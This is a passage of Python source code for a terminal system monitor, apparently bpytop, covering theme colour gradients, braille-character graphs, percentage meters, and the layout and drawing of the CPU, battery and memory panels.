depth=depth, default=default)) #* Create color gradients from one, two or three colors, 101 values indexed 0-100 self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start rgb: Dict[str, Tuple[int, int, int]] colors: List[List[int]] = [] for name in self.gradient: rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec } colors = [ list(getattr(self, f'{name}_start')) ] if rgb["end"][0] >= 0: r = 50 if rgb["mid"][0] >= 0 else 100 for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]: for i in range(r): colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]] if r == 100: break self.gradient[name] += [ Color.fg(*color) for color in colors ] else: c = Color.fg(*rgb["start"]) self.gradient[name] += [c] * 101 #* Set terminal colors Term.fg = f'{self.main_fg}' Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m" Draw.now(self.main_fg, self.main_bg) @classmethod def refresh(cls): '''Sets themes dict with names and paths to all found themes''' cls.themes = { "Default" : "Default" } try: for d in (THEME_DIR, USER_THEME_DIR): if not d: continue for f in os.listdir(d): if f.endswith(".theme"): cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}' except Exception as e: errlog.exception(str(e)) @staticmethod def _load_file(path: str) -> Dict[str, str]: '''Load a bashtop formatted theme file and return a dict''' new_theme: Dict[str, str] = {} try: with open(path, "r") as f: for line in f: if not line.startswith("theme["): continue key = line[6:line.find("]")] s = line.find('"') value = line[s + 1:line.find('"', s + 1)] new_theme[key] = value except Exception as e: errlog.exception(str(e)) return new_theme class Banner: '''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])''' out: List[str] = [] c_color: str = "" length: int = 0 if not out: for num, (color, color2, line) in enumerate(BANNER_SRC): if len(line) > length: length = len(line) out_var = "" line_color = Color.fg(color) line_color2 = Color.fg(color2) line_dark = Color.fg(f'#{80 - num * 6}') for n, letter in enumerate(line): if letter == "█" and c_color != line_color: if 5 < n < 25: c_color = line_color2 else: c_color = line_color out_var += c_color elif letter == " ": letter = f'{Mv.r(1)}' c_color = "" elif letter != "█" and c_color != line_dark: c_color = line_dark out_var += line_dark out_var += letter out.append(out_var) @classmethod def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False): out: str = "" if center: col = Term.width // 2 - cls.length // 2 for n, o in enumerate(cls.out): out += f'{Mv.to(line + n, col)}{o}' out += f'{Term.fg}' if now: Draw.out(out) else: return out class Symbol: h_line: str = "─" v_line: str = "│" left_up: str = "┌" right_up: str = "┐" left_down: str = "└" right_down: str = "┘" title_left: str = "┤" title_right: str = "├" div_up: str = "┬" div_down: str = "┴" graph_up: Dict[float, str] = { 0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸", 1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸", 2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼", 3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾", 4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿" } graph_up_small = graph_up.copy() graph_up_small[0.0] = "\033[1C" graph_down: Dict[float, str] = { 0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸", 1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹", 2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻", 3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿", 4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿" } graph_down_small = graph_down.copy() graph_down_small[0.0] = "\033[1C" meter: str = "■" up: str = "↑" down: str = "↓" left: str = "←" right: str = "→" enter: str = "↲" ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}' fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}' class Graph: '''Class for creating and adding to graphs * __str__ : returns graph as a string * add(value: int) : adds a value to graph and returns it as a string * __call__ : same as add ''' out: str width: int height: int graphs: Dict[bool, List[str]] colors: List[str] invert: bool max_value: int color_max_value: int offset: int current: bool last: int symbol: Dict[float, str] def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None): self.graphs: Dict[bool, List[str]] = {False : [], True : []} self.current: bool = True self.width = width self.height = height self.invert = invert self.offset = offset if not data: data = [0] if max_value: self.max_value = max_value data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling else: self.max_value = 0 if color_max_value: self.color_max_value = color_max_value else: self.color_max_value = self.max_value if self.color_max_value and self.max_value: color_scale = int(100.0 * self.max_value / self.color_max_value) else: color_scale = 100 self.colors: List[str] = [] if isinstance(color, list) and height > 1: for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph if invert: self.colors.reverse() elif isinstance(color, Color) and height > 1: self.colors = [ f'{color}' for _ in range(height) ] else: if isinstance(color, list): self.colors = color elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ] if self.height == 1: self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small else: self.symbol = Symbol.graph_down if invert else Symbol.graph_up value_width: int = ceil(len(data) / 2) filler: str = "" if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set data = data[-(width*2):] value_width = ceil(len(data) / 2) elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace filler = self.symbol[0.0] * (width - value_width) if len(data) % 2: data.insert(0, 0) for _ in range(height): for b in [True, False]: self.graphs[b].append(filler) self._create(data, new=True) def _create(self, data: List[int], new: bool = False): h_high: int h_low: int value: Dict[str, int] = { "left" : 0, "right" : 0 } val: int side: str #* Create the graph for h in range(self.height): h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100 h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0 for v in range(len(data)): if new: self.current = bool(v % 2) #* Switch between True and False graphs if new and v == 0: self.last = 0 for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore if val >= h_high: value[side] = 4 elif val <= h_low: value[side] = 0 else: if self.height == 1: value[side] = round(val * 4 / 100 + 0.5) else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1) if new: self.last = data[v] self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)] if data: self.last = data[-1] self.out = "" if self.height == 1: self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}' elif self.height > 1: for h in range(self.height): if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}' self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}' if self.colors: self.out += f'{Term.fg}' def __call__(self, value: Union[int, None] = None) -> str: if not isinstance(value, int): return self.out self.current = not self.current if self.height == 1: if self.graphs[self.current][0].startswith(self.symbol[0.0]): self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1) else: self.graphs[self.current][0] = self.graphs[self.current][0][1:] else: for n in range(self.height): self.graphs[self.current][n] = self.graphs[self.current][n][1:] if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100 self._create([value]) return self.out def add(self, value: Union[int, None] = None) -> str: return self.__call__(value) def __str__(self): return self.out def __repr__(self): return repr(self.out) class Graphs: '''Holds all graphs and lists of graphs for dynamically created graphs''' cpu: Dict[str, Graph] = {} cores: List[Graph] = [NotImplemented] * THREADS temps: List[Graph] = [NotImplemented] * (THREADS + 1) net: Dict[str, Graph] = {} detailed_cpu: Graph = NotImplemented detailed_mem: Graph = NotImplemented pid_cpu: Dict[int, Graph] = {} class Meter: '''Creates a percentage meter __init__(value, width, theme, gradient_name) to create new meter __call__(value) to set value and return meter as a string __str__ returns last set meter as a string ''' out: str color_gradient: List[str] color_inactive: Color gradient_name: str width: int invert: bool saved: Dict[int, str] def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False): self.gradient_name = gradient_name self.color_gradient = THEME.gradient[gradient_name] self.color_inactive = THEME.meter_bg self.width = width self.saved = {} self.invert = invert self.out = self._create(value) def __call__(self, value: Union[int, None]) -> str: if not isinstance(value, int): return self.out if value > 100: value = 100 elif value < 0: value = 100 if value in self.saved: self.out = self.saved[value] else: self.out = self._create(value) return self.out def __str__(self) -> str: return self.out def __repr__(self): return repr(self.out) def _create(self, value: int) -> str: if value > 100: value = 100 elif value < 0: value = 100 out: str = "" for i in range(1, self.width + 1): if value >= round(i * 100 / self.width): out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}' else: out += self.color_inactive(Symbol.meter * (self.width + 1 - i)) break else: out += f'{Term.fg}' if not value in self.saved: self.saved[value] = out return out class Meters: cpu: Meter battery: Meter mem: Dict[str, Union[Meter, Graph]] = {} swap: Dict[str, Union[Meter, Graph]] = {} disks_used: Dict[str, Meter] = {} disks_free: Dict[str, Meter] = {} class Box: '''Box class with all needed attributes for create_box() function''' name: str height_p: int width_p: int x: int y: int width: int height: int proc_mode: bool = (CONFIG.view_mode == "proc" and not ARG_MODE) or ARG_MODE == "proc" stat_mode: bool = (CONFIG.view_mode == "stat" and not ARG_MODE) or ARG_MODE == "stat" out: str bg: str _b_cpu_h: int _b_mem_h: int redraw_all: bool buffers: List[str] = [] clock_on: bool = False clock: str = "" clock_len: int = 0 resized: bool = False clock_custom_format: Dict[str, Any] = { "/host" : os.uname()[1], "/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0], } if clock_custom_format["/host"].endswith(".local"): clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "") @classmethod def calc_sizes(cls): '''Calculate sizes of boxes''' for sub in cls.__subclasses__(): sub._calc_size() # type: ignore sub.resized = True # type: ignore @classmethod def draw_update_ms(cls, now: bool = True): update_string: str = f'{CONFIG.update_ms}ms' xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15 if not "+" in Key.mouse: Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)] Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)] Draw.buffer("update_ms!" if now and not Menu.active else "update_ms", f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ', f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True) if now and not Menu.active: Draw.clear("update_ms") if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery(): Draw.out("battery") @classmethod def draw_clock(cls, force: bool = False): out: str = "" if force: pass elif not cls.clock_on or Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return clock_string = cls.clock = strftime(CONFIG.draw_clock) for custom in cls.clock_custom_format: if custom in clock_string: clock_string = clock_string.replace(custom, cls.clock_custom_format[custom]) clock_len = len(clock_string[:(CpuBox.width-56)]) if cls.clock_len != clock_len and not CpuBox.resized: out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}' cls.clock_len = clock_len now: bool = False if Menu.active else not force out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}' f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}') Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active) if now and not Menu.active: if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery(): Draw.out("battery") @classmethod def draw_bg(cls, now: bool = True): '''Draw all boxes outlines and titles''' Draw.buffer("bg", "".join(sub._draw_bg() for sub in cls.__subclasses__()), now=now, z=1000, only_save=Menu.active, once=True) # type: ignore cls.draw_update_ms(now=now) if CONFIG.draw_clock: cls.draw_clock(force=True) class SubBox: box_x: int = 0 box_y: int = 0 box_width: int = 0 box_height: int = 0 box_columns: int = 0 column_size: int = 0 class CpuBox(Box, SubBox): name = "cpu" x = 1 y = 1 height_p = 32 width_p = 100 resized: bool = True redraw: bool = False buffer: str = "cpu" battery_percent: int = 1000 battery_secs: int = 0 battery_status: str = "Unknown" old_battery_pos = 0 old_battery_len = 0 battery_path: Union[str, None] = "" battery_clear: bool = False battery_symbols: Dict[str, str] = {"Charging": "▲", "Discharging": "▼", "Full": "■", "Not charging": "■"} clock_block: bool = True Box.buffers.append(buffer) @classmethod def _calc_size(cls): cpu = CpuCollector height_p: int if cls.proc_mode: height_p = 20 else: height_p = cls.height_p cls.width = round(Term.width * cls.width_p / 100) cls.height = round(Term.height * height_p / 100) if cls.height < 8: cls.height = 8 Box._b_cpu_h = cls.height #THREADS = 64 cls.box_columns = ceil((THREADS + 1) / (cls.height - 5)) if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3): cls.column_size = 2 cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1) elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3): cls.column_size = 1 cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1) elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3): cls.column_size = 0 else: cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0 if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1 cls.box_height = ceil(THREADS / cls.box_columns) + 4 if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2 cls.box_x = (cls.width - 1) - cls.box_width cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1 @classmethod def _draw_bg(cls) -> str: if not "M" in Key.mouse: Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)] return (f'{create_box(box=cls, line_color=THEME.cpu_box)}' f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}' f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}') @classmethod def battery_activity(cls) -> bool: if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None: if cls.battery_percent != 1000: cls.battery_clear = True return False if cls.battery_path == "": cls.battery_path = None if os.path.isdir("/sys/class/power_supply"): for directory in sorted(os.listdir("/sys/class/power_supply")): if directory.startswith('BAT') or 'battery' in directory.lower(): cls.battery_path = f'/sys/class/power_supply/{directory}/' break return_true: bool = False percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0)) if percent != cls.battery_percent: cls.battery_percent = percent return_true = True seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0) if seconds != cls.battery_secs: cls.battery_secs = seconds return_true = True status: str = "not_set" if cls.battery_path: status = readfile(cls.battery_path + "status", default="not_set") if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True: status = "Charging" if cls.battery_percent < 100 else "Full" elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False: status = "Discharging" elif status == "not_set": status = "Unknown" if status != cls.battery_status: cls.battery_status = status return_true = True return return_true or cls.resized or cls.redraw or Menu.active @classmethod def _draw_fg(cls): cpu = CpuCollector if cpu.redraw: cls.redraw = True out: str = "" out_misc: str = "" lavg: str = "" x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2 bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2 hh: int = ceil(h / 2) hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores if cls.resized or cls.redraw: if not "m" in Key.mouse: Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)] out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{ARG_MODE or CONFIG.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}' Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0]) Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True) Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu") if cls.column_size > 0 or ct_width > 0: for n in range(THREADS): Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1]) if cpu.got_sensors: Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23) if cls.column_size > 1: for n in range(1, THREADS + 1): if not cpu.cpu_temp[n]: continue Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23) Draw.buffer("cpu_misc", out_misc, only_save=True) if CONFIG.show_battery and cls.battery_activity(): bat_out: str = "" if cls.battery_secs > 0: battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}' else: battery_time = "" if not hasattr(Meters, "battery") or cls.resized: Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True) battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○") battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}') battery_pos = cls.width - battery_len - 17 if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized: bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}' cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+ ("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') + f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}') Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active) elif cls.battery_clear: out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}' cls.battery_clear = False cls.battery_percent = 1000 cls.battery_secs = 0 cls.battery_status = "Unknown" cls.old_battery_pos = 0 cls.old_battery_len = 0 cls.battery_path = "" Draw.clear("battery", saved=True) cx = cy = cc = 0 ccw = (bw + 1) // cls.box_columns if cpu.cpu_freq: freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz' out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}' out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}' f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}' f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%') if cpu.got_sensors: try: out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}' f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C') except: cpu.got_sensors = False cy += 1 for n in range(1, THREADS + 1): out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}' if cls.column_size > 0 or ct_width > 0: out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}' else: out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}' out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%' if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores: try: if cls.column_size > 1: out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}' else: out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}' out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C' except: cpu.got_sensors = False elif cpu.got_sensors and not hide_cores: out += f'{Mv.r(max(6, 6 * cls.column_size))}' out += f'{THEME.div_line(Symbol.v_line)}' cy += 1 if cy > ceil(THREADS/cls.box_columns) and n != THREADS: cc += 1; cy = 1; cx = ccw * cc if cc == cls.box_columns: break if cy < bh - 1: cy = bh - 1 if cy < bh and cc < cls.box_columns: if cls.column_size == 2 and cpu.got_sensors: lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}' elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors): lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}' elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors): lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}' else: lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}' out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}' out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}' Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active) cls.resized = cls.redraw = cls.clock_block = False class MemBox(Box): name = "mem" height_p = 38 width_p = 45 x = 1 y = 1 mem_meter: int = 0 mem_size: int = 0 disk_meter: int = 0 divider: int = 0 mem_width: int = 0 disks_width: int = 0 graph_height: int resized: bool = True redraw: bool = False buffer: str = "mem" swap_on: bool = CONFIG.show_swap Box.buffers.append(buffer) mem_names: List[str] = ["used", "available", "cached", "free"] swap_names: List[str] = ["used", "free"] @classmethod def _calc_size(cls): width_p: int; height_p: int if cls.stat_mode: width_p, height_p = 100, cls.height_p else: width_p, height_p = cls.width_p, cls.height_p cls.width = round(Term.width * width_p / 100) cls.height = round(Term.height * height_p / 100) + 1 Box._b_mem_h = cls.height cls.y = Box._b_cpu_h + 1 if CONFIG.show_disks: cls.mem_width = ceil((cls.width - 3) / 2) cls.disks_width = cls.width - cls.mem_width - 3 if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1 cls.divider = cls.x + cls.mem_width else: cls.mem_width = cls.width - 1 item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4 if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3 elif cls.mem_width > 25: cls.mem_size = 2 else: cls.mem_size = 1 cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20) if cls.mem_size == 1: cls.mem_meter += 6 if cls.mem_meter < 1: cls.mem_meter = 0 if CONFIG.mem_graphs: cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height) if cls.graph_height == 0: cls.graph_height = 1 if cls.graph_height > 1: cls.mem_meter += 6 else: cls.graph_height = 0 if CONFIG.show_disks: cls.disk_meter = cls.width - cls.mem_width - 23 if cls.disks_width < 25: cls.disk_meter += 10 if cls.disk_meter < 1: cls.disk_meter = 0 @classmethod def _draw_bg(cls) -> str: if cls.proc_mode: return "" out: str = "" out += f'{create_box(box=cls, line_color=THEME.mem_box)}' if CONFIG.show_disks: out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.title("disks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}' f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}' f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}' f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}') return out @classmethod def _draw_fg(cls): if cls.proc_mode: return mem = MemCollector if mem.redraw: cls.redraw = True out: str = "" out_misc: str = "" gbg: str = "" gmv: str = "" gli: str = "" x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2 if cls.resized or cls.redraw: cls._calc_size() out_misc += cls._draw_bg() Meters.mem = {} Meters.swap = {} Meters.disks_used = {} Meters.disks_free = {} if cls.mem_meter > 0: for name in cls.mem_names: if CONFIG.mem_graphs: Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name]) else: Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name) if cls.swap_on: for name in cls.swap_names: if CONFIG.mem_graphs and not CONFIG.swap_disk: Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name]) elif CONFIG.swap_disk and CONFIG.show_disks: Meters.disks_used["__swap"] = Meter(mem.swap_percent["used"], cls.disk_meter, "used") if len(mem.disks) * 3 <= h + 1: Meters.disks_free["__swap"] = Meter(mem.swap_percent["free"], cls.disk_meter, "free") break else: Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name) if cls.disk_meter > 0: for n, name in enumerate(mem.disks.keys()): if n * 2 > h: break Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used") if len(mem.disks) * 3 <= h + 1: Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free") if not "g" in Key.mouse: Key.mouse["g"] = [[x + cls.mem_width - 8 + i, y-1] for i in range(5)] out_misc += (f'{Mv.to(y-1, x + cls.mem_width - 9)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}' f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}') if CONFIG.show_disks: if not "s" in Key.mouse: Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)] out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}' f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}') if Collector.collect_interrupt: return Draw.buffer("mem_misc", out_misc, only_save=True) try: #* Mem cx = 1; cy = 1 out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}' if cls.graph_height > 0: gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}' if cls.graph_height >= 2: gbg = f'{Mv.l(1)}' gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}' big_mem: bool = cls.mem_width > 21 for name in cls.mem_names: if Collector.collect_interrupt: return if cls.mem_size > 2: out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}' f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}') cy += 2 if not cls.graph_height else cls.graph_height + 1 else: out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 